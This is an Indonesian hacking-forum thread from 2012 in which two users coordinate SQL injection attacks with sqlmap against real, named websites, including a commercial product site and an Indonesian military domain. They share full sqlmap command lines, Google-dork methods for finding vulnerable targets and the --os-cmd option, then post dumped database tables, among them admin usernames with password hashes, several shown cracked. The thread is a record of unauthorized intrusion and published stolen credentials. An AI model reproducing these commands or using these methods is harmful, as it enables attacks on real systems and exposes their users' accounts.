SQLi Sqlmap.py - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html) +---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html) +----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html) +----- Thread: SQLi Sqlmap.py (/thread-713.html) |
RE: SQLi Sqlmap.py - fake666 - 03-22-2012 ok om RE: SQLi Sqlmap.py - Junior Riau - 03-22-2012 (03-22-2012, 07:22 PM)fake666 Wrote: ok om ok,,yuk mari mulai,,kita bahas apa dulu nah ane ada vulner ni C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns niat coba? koneksi ku g terlalu kuat buat inject wkwkwk RE: SQLi Sqlmap.py - fake666 - 03-22-2012 (03-22-2012, 11:18 PM)junior.riau18 Wrote:ayok om??(03-22-2012, 07:22 PM)fake666 Wrote: ok om mau coba punya ane juga gak?? python sqlmap.py -u "www.tni.mil.id/index2.php?page=datagallery.html&gctg_code=27" --random-agent --threads 10 --dbs oh iya mau nany juga..si om nyari vulnernya pake apa? RE: SQLi Sqlmap.py - Junior Riau - 03-22-2012 om g ada yang lebih seram targetnya -____-" tni mak jank wkwkw pakek google google dork,,biasa kan buat nya inurl:product.php?id= nah ane g pakek inurl,,langsung product.php?id=,,terserah kita si,,itu mainan imajinasi aja nah selesai inject kita cba yang ente maksud ini dia optionnya : Code: --os-cmd=OSCMD Execute an operating system command RE: SQLi Sqlmap.py - fake666 - 03-22-2012 akwkawa dari pada kemarin polri akwkaw tapi itu adminnya cuman disable klik kanan gak ngepacth sistimnya ya ane test aja == nunggu si om dulu akwkaw sekalian om bikinin tutorialnya RE: SQLi Sqlmap.py - Junior Riau - 03-22-2012 surem dah ente bisa di bom ane wkwkwk pakek target ane aja gimana??target luar lebih aman sedikit silahkan didump dulu ajah untuk tabel ganti aja langsung ke tabel "users" ilangin kutipnya ya RE: SQLi Sqlmap.py - fake666 - 03-22-2012 akwka ini aja lagi gemeteran.. oke omm lagi di liat2 nih isinya RE: SQLi Sqlmap.py - Junior Riau - 03-22-2012 makanya jangan yang aneh2 dah wkwkwkwkkw kalo dah kelar dump tbl users post dimari atau pm ane aja RE: SQLi Sqlmap.py - fake666 - 03-23-2012 Database: altechna2 Table: adminlog [6 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | action | varchar(255) | | item_id | int(11) | | item_name | varchar(50) | | timestamp | int(11) | | user_id | int(11) | | username | varchar(25) | +-----------+--------------+ Database: altechna2 Table: additional_users [4 columns] +---------------------+---------+ | Column | Type | +---------------------+---------+ | additional_users_id | int(11) | | content_id | int(11) | | page_id | int(11) | | user_id | int(11) | +---------------------+---------+ Database: altechna2 Table: additional_users [0 entries] +---------------------+ | additional_users_id | +---------------------+ +---------------------+ no found something == ad yang mau coba juga ? maaf tadi salah ada ada om junior.riau18 nih dia Database: altechna2 Table: users [3 entries] +--------------------------------------------+------------+ | password | username | +--------------------------------------------+------------+ | f49e49c743ab7195b10386bef8ac9943 | mediaforma | | c9330587565205a5b8345f60c620ecc6 (editor1) | editor | | 6acb0784b9dde050a12dc69edc69b45f (namas) | admin | +--------------------------------------------+------------+ tapi gak bisa login arghh== RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012 pakek tabl users,,ada 70 tabel disana om kalo g percaya coba aja bbuat -D altechna2 --tables,, ntarlihat berapa banyak blikan tabelnya wkwkkw |